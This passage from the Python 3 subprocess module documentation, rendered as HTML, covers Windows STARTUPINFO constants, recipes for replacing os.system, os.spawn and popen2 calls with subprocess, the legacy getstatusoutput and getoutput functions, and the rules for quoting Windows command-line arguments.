<tt class="descname">hStdError</tt><a class="headerlink" href="#subprocess.STARTUPINFO.hStdError" title="Permalink to this definition">¶</a></dt>
<dd><p>If <a class="reference internal" href="#subprocess.STARTUPINFO.dwFlags" title="subprocess.STARTUPINFO.dwFlags"><tt class="xref py py-attr docutils literal"><span class="pre">dwFlags</span></tt></a> specifies <a class="reference internal" href="#subprocess.STARTF_USESTDHANDLES" title="subprocess.STARTF_USESTDHANDLES"><tt class="xref py py-data docutils literal"><span class="pre">STARTF_USESTDHANDLES</span></tt></a>, this attribute
is the standard error handle for the process. Otherwise, this attribute is
ignored and the default for standard error is the console window’s buffer.</p>
</dd></dl>
<dl class="attribute">
<dt id="subprocess.STARTUPINFO.wShowWindow">
<tt class="descname">wShowWindow</tt><a class="headerlink" href="#subprocess.STARTUPINFO.wShowWindow" title="Permalink to this definition">¶</a></dt>
<dd><p>If <a class="reference internal" href="#subprocess.STARTUPINFO.dwFlags" title="subprocess.STARTUPINFO.dwFlags"><tt class="xref py py-attr docutils literal"><span class="pre">dwFlags</span></tt></a> specifies <a class="reference internal" href="#subprocess.STARTF_USESHOWWINDOW" title="subprocess.STARTF_USESHOWWINDOW"><tt class="xref py py-data docutils literal"><span class="pre">STARTF_USESHOWWINDOW</span></tt></a>, this attribute
can be any of the values that can be specified in the <tt class="docutils literal"><span class="pre">nCmdShow</span></tt>
parameter for the
<a class="reference external" href="http://msdn.microsoft.com/en-us/library/ms633548(v=vs.85).aspx">ShowWindow</a>
function, except for <tt class="docutils literal"><span class="pre">SW_SHOWDEFAULT</span></tt>. Otherwise, this attribute is
ignored.</p>
<p><a class="reference internal" href="#subprocess.SW_HIDE" title="subprocess.SW_HIDE"><tt class="xref py py-data docutils literal"><span class="pre">SW_HIDE</span></tt></a> is provided for this attribute. It is used when
<a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> is called with <tt class="docutils literal"><span class="pre">shell=True</span></tt>.</p>
</dd></dl>
</dd></dl>
<div class="section" id="constants">
<h3>17.5.4.1. Constants<a class="headerlink" href="#constants" title="Permalink to this headline">¶</a></h3>
<p>The <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> module exposes the following constants.</p>
<dl class="data">
<dt id="subprocess.STD_INPUT_HANDLE">
<tt class="descclassname">subprocess.</tt><tt class="descname">STD_INPUT_HANDLE</tt><a class="headerlink" href="#subprocess.STD_INPUT_HANDLE" title="Permalink to this definition">¶</a></dt>
<dd><p>The standard input device. Initially, this is the console input buffer,
<tt class="docutils literal"><span class="pre">CONIN$</span></tt>.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.STD_OUTPUT_HANDLE">
<tt class="descclassname">subprocess.</tt><tt class="descname">STD_OUTPUT_HANDLE</tt><a class="headerlink" href="#subprocess.STD_OUTPUT_HANDLE" title="Permalink to this definition">¶</a></dt>
<dd><p>The standard output device. Initially, this is the active console screen
buffer, <tt class="docutils literal"><span class="pre">CONOUT$</span></tt>.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.STD_ERROR_HANDLE">
<tt class="descclassname">subprocess.</tt><tt class="descname">STD_ERROR_HANDLE</tt><a class="headerlink" href="#subprocess.STD_ERROR_HANDLE" title="Permalink to this definition">¶</a></dt>
<dd><p>The standard error device. Initially, this is the active console screen
buffer, <tt class="docutils literal"><span class="pre">CONOUT$</span></tt>.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.SW_HIDE">
<tt class="descclassname">subprocess.</tt><tt class="descname">SW_HIDE</tt><a class="headerlink" href="#subprocess.SW_HIDE" title="Permalink to this definition">¶</a></dt>
<dd><p>Hides the window. Another window will be activated.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.STARTF_USESTDHANDLES">
<tt class="descclassname">subprocess.</tt><tt class="descname">STARTF_USESTDHANDLES</tt><a class="headerlink" href="#subprocess.STARTF_USESTDHANDLES" title="Permalink to this definition">¶</a></dt>
<dd><p>Specifies that the <a class="reference internal" href="#subprocess.STARTUPINFO.hStdInput" title="subprocess.STARTUPINFO.hStdInput"><tt class="xref py py-attr docutils literal"><span class="pre">STARTUPINFO.hStdInput</span></tt></a>,
<a class="reference internal" href="#subprocess.STARTUPINFO.hStdOutput" title="subprocess.STARTUPINFO.hStdOutput"><tt class="xref py py-attr docutils literal"><span class="pre">STARTUPINFO.hStdOutput</span></tt></a>, and <a class="reference internal" href="#subprocess.STARTUPINFO.hStdError" title="subprocess.STARTUPINFO.hStdError"><tt class="xref py py-attr docutils literal"><span class="pre">STARTUPINFO.hStdError</span></tt></a> attributes
contain additional information.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.STARTF_USESHOWWINDOW">
<tt class="descclassname">subprocess.</tt><tt class="descname">STARTF_USESHOWWINDOW</tt><a class="headerlink" href="#subprocess.STARTF_USESHOWWINDOW" title="Permalink to this definition">¶</a></dt>
<dd><p>Specifies that the <a class="reference internal" href="#subprocess.STARTUPINFO.wShowWindow" title="subprocess.STARTUPINFO.wShowWindow"><tt class="xref py py-attr docutils literal"><span class="pre">STARTUPINFO.wShowWindow</span></tt></a> attribute contains
additional information.</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.CREATE_NEW_CONSOLE">
<tt class="descclassname">subprocess.</tt><tt class="descname">CREATE_NEW_CONSOLE</tt><a class="headerlink" href="#subprocess.CREATE_NEW_CONSOLE" title="Permalink to this definition">¶</a></dt>
<dd><p>The new process has a new console, instead of inheriting its parent’s
console (the default).</p>
</dd></dl>
<dl class="data">
<dt id="subprocess.CREATE_NEW_PROCESS_GROUP">
<tt class="descclassname">subprocess.</tt><tt class="descname">CREATE_NEW_PROCESS_GROUP</tt><a class="headerlink" href="#subprocess.CREATE_NEW_PROCESS_GROUP" title="Permalink to this definition">¶</a></dt>
<dd><p>A <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> <tt class="docutils literal"><span class="pre">creationflags</span></tt> parameter to specify that a new process
group will be created. This flag is necessary for using <a class="reference internal" href="os.html#os.kill" title="os.kill"><tt class="xref py py-func docutils literal"><span class="pre">os.kill()</span></tt></a>
on the subprocess.</p>
<p>This flag is ignored if <a class="reference internal" href="#subprocess.CREATE_NEW_CONSOLE" title="subprocess.CREATE_NEW_CONSOLE"><tt class="xref py py-data docutils literal"><span class="pre">CREATE_NEW_CONSOLE</span></tt></a> is specified.</p>
</dd></dl>
</div>
</div>
<div class="section" id="replacing-older-functions-with-the-subprocess-module">
<span id="subprocess-replacements"></span><h2>17.5.5. Replacing Older Functions with the <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> Module<a class="headerlink" href="#replacing-older-functions-with-the-subprocess-module" title="Permalink to this headline">¶</a></h2>
<p>In this section, “a becomes b” means that b can be used as a replacement for a.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p>All “a” functions in this section fail (more or less) silently if the
executed program cannot be found; the “b” replacements raise <a class="reference internal" href="exceptions.html#OSError" title="OSError"><tt class="xref py py-exc docutils literal"><span class="pre">OSError</span></tt></a>
instead.</p>
<p class="last">In addition, the replacements using <a class="reference internal" href="#subprocess.check_output" title="subprocess.check_output"><tt class="xref py py-func docutils literal"><span class="pre">check_output()</span></tt></a> will fail with a
<a class="reference internal" href="#subprocess.CalledProcessError" title="subprocess.CalledProcessError"><tt class="xref py py-exc docutils literal"><span class="pre">CalledProcessError</span></tt></a> if the requested operation produces a non-zero
return code. The output is still available as the
<a class="reference internal" href="#subprocess.CalledProcessError.output" title="subprocess.CalledProcessError.output"><tt class="xref py py-attr docutils literal"><span class="pre">output</span></tt></a> attribute of the raised exception.</p>
</div>
<p>In the following examples, we assume that the relevant functions have already
been imported from the <a class="reference internal" href="#module-subprocess" title="subprocess: Subprocess management."><tt class="xref py py-mod docutils literal"><span class="pre">subprocess</span></tt></a> module.</p>
<div class="section" id="replacing-bin-sh-shell-backquote">
<h3>17.5.5.1. Replacing /bin/sh shell backquote<a class="headerlink" href="#replacing-bin-sh-shell-backquote" title="Permalink to this headline">¶</a></h3>
<div class="highlight-python3"><div class="highlight"><pre>output=`mycmd myarg`
# becomes
output = check_output(["mycmd", "myarg"])
</pre></div>
</div>
</div>
<div class="section" id="replacing-shell-pipeline">
<h3>17.5.5.2. Replacing shell pipeline<a class="headerlink" href="#replacing-shell-pipeline" title="Permalink to this headline">¶</a></h3>
<div class="highlight-python3"><div class="highlight"><pre>output=`dmesg | grep hda`
# becomes
p1 = Popen(["dmesg"], stdout=PIPE)
p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
output = p2.communicate()[0]
</pre></div>
</div>
<p>The p1.stdout.close() call after starting the p2 is important in order for p1
to receive a SIGPIPE if p2 exits before p1.</p>
<p>Alternatively, for trusted input, the shell’s own pipeline support may still
be used directly:</p>
<div class="highlight-python3"><div class="highlight"><pre>output=`dmesg | grep hda`
# becomes
output=check_output("dmesg | grep hda", shell=True)
</pre></div>
</div>
</div>
<div class="section" id="replacing-os-system">
<h3>17.5.5.3. Replacing <a class="reference internal" href="os.html#os.system" title="os.system"><tt class="xref py py-func docutils literal"><span class="pre">os.system()</span></tt></a><a class="headerlink" href="#replacing-os-system" title="Permalink to this headline">¶</a></h3>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">sts</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s">"mycmd"</span> <span class="o">+</span> <span class="s">" myarg"</span><span class="p">)</span>
<span class="c"># becomes</span>
<span class="n">sts</span> <span class="o">=</span> <span class="n">call</span><span class="p">(</span><span class="s">"mycmd"</span> <span class="o">+</span> <span class="s">" myarg"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
</pre></div>
</div>
<p>Notes:</p>
<ul class="simple">
<li>Calling the program through the shell is usually not required.</li>
</ul>
<p>A more realistic example would look like this:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="k">try</span><span class="p">:</span>
<span class="n">retcode</span> <span class="o">=</span> <span class="n">call</span><span class="p">(</span><span class="s">"mycmd"</span> <span class="o">+</span> <span class="s">" myarg"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="k">if</span> <span class="n">retcode</span> <span class="o"><</span> <span class="mi">0</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s">"Child was terminated by signal"</span><span class="p">,</span> <span class="o">-</span><span class="n">retcode</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s">"Child returned"</span><span class="p">,</span> <span class="n">retcode</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">OSError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s">"Execution failed:"</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
</pre></div>
</div>
</div>
<div class="section" id="replacing-the-os-spawn-family">
<h3>17.5.5.4. Replacing the <a class="reference internal" href="os.html#os.spawnl" title="os.spawnl"><tt class="xref py py-func docutils literal"><span class="pre">os.spawn</span></tt></a> family<a class="headerlink" href="#replacing-the-os-spawn-family" title="Permalink to this headline">¶</a></h3>
<p>P_NOWAIT example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">pid</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">spawnlp</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">P_NOWAIT</span><span class="p">,</span> <span class="s">"/bin/mycmd"</span><span class="p">,</span> <span class="s">"mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">pid</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">([</span><span class="s">"/bin/mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">])</span><span class="o">.</span><span class="n">pid</span>
</pre></div>
</div>
<p>P_WAIT example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">retcode</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">spawnlp</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">P_WAIT</span><span class="p">,</span> <span class="s">"/bin/mycmd"</span><span class="p">,</span> <span class="s">"mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">retcode</span> <span class="o">=</span> <span class="n">call</span><span class="p">([</span><span class="s">"/bin/mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">])</span>
</pre></div>
</div>
<p>Vector example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">os</span><span class="o">.</span><span class="n">spawnvp</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">P_NOWAIT</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">args</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">Popen</span><span class="p">([</span><span class="n">path</span><span class="p">]</span> <span class="o">+</span> <span class="n">args</span><span class="p">[</span><span class="mi">1</span><span class="p">:])</span>
</pre></div>
</div>
<p>Environment example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">os</span><span class="o">.</span><span class="n">spawnlpe</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">P_NOWAIT</span><span class="p">,</span> <span class="s">"/bin/mycmd"</span><span class="p">,</span> <span class="s">"mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">,</span> <span class="n">env</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">Popen</span><span class="p">([</span><span class="s">"/bin/mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">],</span> <span class="n">env</span><span class="o">=</span><span class="p">{</span><span class="s">"PATH"</span><span class="p">:</span> <span class="s">"/usr/bin"</span><span class="p">})</span>
</pre></div>
</div>
</div>
<div class="section" id="replacing-os-popen-os-popen2-os-popen3">
<h3>17.5.5.5. Replacing <a class="reference internal" href="os.html#os.popen" title="os.popen"><tt class="xref py py-func docutils literal"><span class="pre">os.popen()</span></tt></a>, <tt class="xref py py-func docutils literal"><span class="pre">os.popen2()</span></tt>, <tt class="xref py py-func docutils literal"><span class="pre">os.popen3()</span></tt><a class="headerlink" href="#replacing-os-popen-os-popen2-os-popen3" title="Permalink to this headline">¶</a></h3>
<div class="highlight-python3"><div class="highlight"><pre><span class="p">(</span><span class="n">child_stdin</span><span class="p">,</span> <span class="n">child_stdout</span><span class="p">)</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen2</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">mode</span><span class="p">,</span> <span class="n">bufsize</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">p</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">,</span> <span class="n">bufsize</span><span class="o">=</span><span class="n">bufsize</span><span class="p">,</span>
<span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="p">(</span><span class="n">child_stdin</span><span class="p">,</span> <span class="n">child_stdout</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">stdin</span><span class="p">,</span> <span class="n">p</span><span class="o">.</span><span class="n">stdout</span><span class="p">)</span>
</pre></div>
</div>
<div class="highlight-python3"><div class="highlight"><pre><span class="p">(</span><span class="n">child_stdin</span><span class="p">,</span>
<span class="n">child_stdout</span><span class="p">,</span>
<span class="n">child_stderr</span><span class="p">)</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen3</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">mode</span><span class="p">,</span> <span class="n">bufsize</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">p</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">,</span> <span class="n">bufsize</span><span class="o">=</span><span class="n">bufsize</span><span class="p">,</span>
<span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="p">(</span><span class="n">child_stdin</span><span class="p">,</span>
<span class="n">child_stdout</span><span class="p">,</span>
<span class="n">child_stderr</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">stdin</span><span class="p">,</span> <span class="n">p</span><span class="o">.</span><span class="n">stdout</span><span class="p">,</span> <span class="n">p</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
</pre></div>
</div>
<div class="highlight-python3"><div class="highlight"><pre><span class="p">(</span><span class="n">child_stdin</span><span class="p">,</span> <span class="n">child_stdout_and_stderr</span><span class="p">)</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen4</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">mode</span><span class="p">,</span> <span class="n">bufsize</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">p</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">,</span> <span class="n">bufsize</span><span class="o">=</span><span class="n">bufsize</span><span class="p">,</span>
<span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="n">STDOUT</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="p">(</span><span class="n">child_stdin</span><span class="p">,</span> <span class="n">child_stdout_and_stderr</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">stdin</span><span class="p">,</span> <span class="n">p</span><span class="o">.</span><span class="n">stdout</span><span class="p">)</span>
</pre></div>
</div>
<p>Return code handling translates as follows:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="n">pipe</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span>
<span class="o">...</span>
<span class="n">rc</span> <span class="o">=</span> <span class="n">pipe</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">if</span> <span class="n">rc</span> <span class="ow">is</span> <span class="ow">not</span> <span class="k">None</span> <span class="ow">and</span> <span class="n">rc</span> <span class="o">>></span> <span class="mi">8</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s">"There were some errors"</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">process</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="s">'w'</span><span class="p">,</span> <span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">)</span>
<span class="o">...</span>
<span class="n">process</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">if</span> <span class="n">process</span><span class="o">.</span><span class="n">wait</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s">"There were some errors"</span><span class="p">)</span>
</pre></div>
</div>
</div>
<div class="section" id="replacing-functions-from-the-popen2-module">
<h3>17.5.5.6. Replacing functions from the <tt class="xref py py-mod docutils literal"><span class="pre">popen2</span></tt> module<a class="headerlink" href="#replacing-functions-from-the-popen2-module" title="Permalink to this headline">¶</a></h3>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">If the cmd argument to popen2 functions is a string, the command is executed
through /bin/sh. If it is a list, the command is directly executed.</p>
</div>
<div class="highlight-python3"><div class="highlight"><pre><span class="p">(</span><span class="n">child_stdout</span><span class="p">,</span> <span class="n">child_stdin</span><span class="p">)</span> <span class="o">=</span> <span class="n">popen2</span><span class="o">.</span><span class="n">popen2</span><span class="p">(</span><span class="s">"somestring"</span><span class="p">,</span> <span class="n">bufsize</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">p</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="s">"somestring"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="k">True</span><span class="p">,</span> <span class="n">bufsize</span><span class="o">=</span><span class="n">bufsize</span><span class="p">,</span>
<span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="p">(</span><span class="n">child_stdout</span><span class="p">,</span> <span class="n">child_stdin</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">stdout</span><span class="p">,</span> <span class="n">p</span><span class="o">.</span><span class="n">stdin</span><span class="p">)</span>
</pre></div>
</div>
<div class="highlight-python3"><div class="highlight"><pre><span class="p">(</span><span class="n">child_stdout</span><span class="p">,</span> <span class="n">child_stdin</span><span class="p">)</span> <span class="o">=</span> <span class="n">popen2</span><span class="o">.</span><span class="n">popen2</span><span class="p">([</span><span class="s">"mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">],</span> <span class="n">bufsize</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="o">==></span>
<span class="n">p</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">([</span><span class="s">"mycmd"</span><span class="p">,</span> <span class="s">"myarg"</span><span class="p">],</span> <span class="n">bufsize</span><span class="o">=</span><span class="n">bufsize</span><span class="p">,</span>
<span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">close_fds</span><span class="o">=</span><span class="k">True</span><span class="p">)</span>
<span class="p">(</span><span class="n">child_stdout</span><span class="p">,</span> <span class="n">child_stdin</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">stdout</span><span class="p">,</span> <span class="n">p</span><span class="o">.</span><span class="n">stdin</span><span class="p">)</span>
</pre></div>
</div>
<p><tt class="xref py py-class docutils literal"><span class="pre">popen2.Popen3</span></tt> and <tt class="xref py py-class docutils literal"><span class="pre">popen2.Popen4</span></tt> basically work as
<a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">subprocess.Popen</span></tt></a>, except that:</p>
<ul class="simple">
<li><a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> raises an exception if the execution fails.</li>
<li>the <em>capturestderr</em> argument is replaced with the <em>stderr</em> argument.</li>
<li><tt class="docutils literal"><span class="pre">stdin=PIPE</span></tt> and <tt class="docutils literal"><span class="pre">stdout=PIPE</span></tt> must be specified.</li>
<li>popen2 closes all file descriptors by default, but you have to specify
<tt class="docutils literal"><span class="pre">close_fds=True</span></tt> with <a class="reference internal" href="#subprocess.Popen" title="subprocess.Popen"><tt class="xref py py-class docutils literal"><span class="pre">Popen</span></tt></a> to guarantee this behavior on
all platforms or past Python versions.</li>
</ul>
</div>
</div>
<div class="section" id="legacy-shell-invocation-functions">
<h2>17.5.6. Legacy Shell Invocation Functions<a class="headerlink" href="#legacy-shell-invocation-functions" title="Permalink to this headline">¶</a></h2>
<p>This module also provides the following legacy functions from the 2.x
<tt class="docutils literal"><span class="pre">commands</span></tt> module. These operations implicitly invoke the system shell and
none of the guarantees described above regarding security and exception
handling consistency are valid for these functions.</p>
<dl class="function">
<dt id="subprocess.getstatusoutput">
<tt class="descclassname">subprocess.</tt><tt class="descname">getstatusoutput</tt><big>(</big><em>cmd</em><big>)</big><a class="headerlink" href="#subprocess.getstatusoutput" title="Permalink to this definition">¶</a></dt>
<dd><p>Return <tt class="docutils literal"><span class="pre">(status,</span> <span class="pre">output)</span></tt> of executing <em>cmd</em> in a shell.</p>
<p>Execute the string <em>cmd</em> in a shell with <tt class="xref py py-meth docutils literal"><span class="pre">Popen.check_output()</span></tt> and
return a 2-tuple <tt class="docutils literal"><span class="pre">(status,</span> <span class="pre">output)</span></tt>. Universal newlines mode is used;
see the notes on <a class="reference internal" href="#frequently-used-arguments"><em>Frequently Used Arguments</em></a> for more details.</p>
<p>A trailing newline is stripped from the output.
The exit status for the command can be interpreted
according to the rules for the C function <tt class="xref c c-func docutils literal"><span class="pre">wait()</span></tt>. Example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">getstatusoutput</span><span class="p">(</span><span class="s">'ls /bin/ls'</span><span class="p">)</span>
<span class="go">(0, '/bin/ls')</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">getstatusoutput</span><span class="p">(</span><span class="s">'cat /bin/junk'</span><span class="p">)</span>
<span class="go">(256, 'cat: /bin/junk: No such file or directory')</span>
<span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">getstatusoutput</span><span class="p">(</span><span class="s">'/bin/junk'</span><span class="p">)</span>
<span class="go">(256, 'sh: /bin/junk: not found')</span>
</pre></div>
</div>
<p>Availability: POSIX & Windows</p>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3.4: </span>Windows support added</p>
</div>
</dd></dl>
<dl class="function">
<dt id="subprocess.getoutput">
<tt class="descclassname">subprocess.</tt><tt class="descname">getoutput</tt><big>(</big><em>cmd</em><big>)</big><a class="headerlink" href="#subprocess.getoutput" title="Permalink to this definition">¶</a></dt>
<dd><p>Return output (stdout and stderr) of executing <em>cmd</em> in a shell.</p>
<p>Like <a class="reference internal" href="#subprocess.getstatusoutput" title="subprocess.getstatusoutput"><tt class="xref py py-func docutils literal"><span class="pre">getstatusoutput()</span></tt></a>, except the exit status is ignored and the return
value is a string containing the command’s output. Example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">subprocess</span><span class="o">.</span><span class="n">getoutput</span><span class="p">(</span><span class="s">'ls /bin/ls'</span><span class="p">)</span>
<span class="go">'/bin/ls'</span>
</pre></div>
</div>
<p>Availability: POSIX & Windows</p>
<div class="versionchanged">
<p><span class="versionmodified">Changed in version 3.3.4: </span>Windows support added</p>
</div>
</dd></dl>
</div>
<div class="section" id="notes">
<h2>17.5.7. Notes<a class="headerlink" href="#notes" title="Permalink to this headline">¶</a></h2>
<div class="section" id="converting-an-argument-sequence-to-a-string-on-windows">
<span id="converting-argument-sequence"></span><h3>17.5.7.1. Converting an argument sequence to a string on Windows<a class="headerlink" href="#converting-an-argument-sequence-to-a-string-on-windows" title="Permalink to this headline">¶</a></h3>
<p>On Windows, an <em>args</em> sequence is converted to a string that can be parsed
using the following rules (which correspond to the rules used by the MS C
runtime):</p>
<ol class="arabic simple">
<li>Arguments are delimited by white space, which is either a
space or a tab.</li>
<li>A string surrounded by double quotation marks is
interpreted as a single argument, regardless of white space
contained within. A quoted string can be embedded in an
argument.</li>
<li>A double quotation mark preceded by a backslash is
interpreted as a literal double quotation mark.</li>
<li>Backslashes are interpreted literally, unless they
immediately precede a double quotation mark.</li>
<li>If backslashes immediately precede a double quotation mark,
every pair of backslashes is interpreted as a literal
backslash. If the number of backslashes is odd, the last
backslash escapes the next double quotation mark as
described in rule 3.</li>
</ol>
<div class="admonition seealso">
<p class="first admonition-title">See also</p>
<dl class="last docutils">
<dt><a class="reference internal" href="shlex.html#module-shlex" title="shlex: Simple lexical analysis for Unix shell-like languages."><tt class="xref py py-mod docutils literal"><span class="pre">shlex</span></tt></a></dt>
<dd>Module which provides function to parse and escape command lines.</dd>
</dl>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar">
<div class="sphinxsidebarwrapper">
<h3><a href="../contents.html">Table Of Contents</a></h3>
<ul>
<li><a class="reference internal" href="#">17.5. <tt class="docutils literal"><span class="pre">subprocess</span></tt> — Subprocess management</a><ul>
<li><a class="reference internal" href="#using-the-subprocess-module">17.5.1. Using the <tt class="docutils literal"><span class="pre">subprocess</span></tt> Module</a><ul>
<li><a class="reference internal" href="#frequently-used-arguments">17.5.1.1. Frequently Used Arguments</a></li>
<li><a class="reference internal" href="#popen-constructor">17.5.1.2. Popen Constructor</a></li>
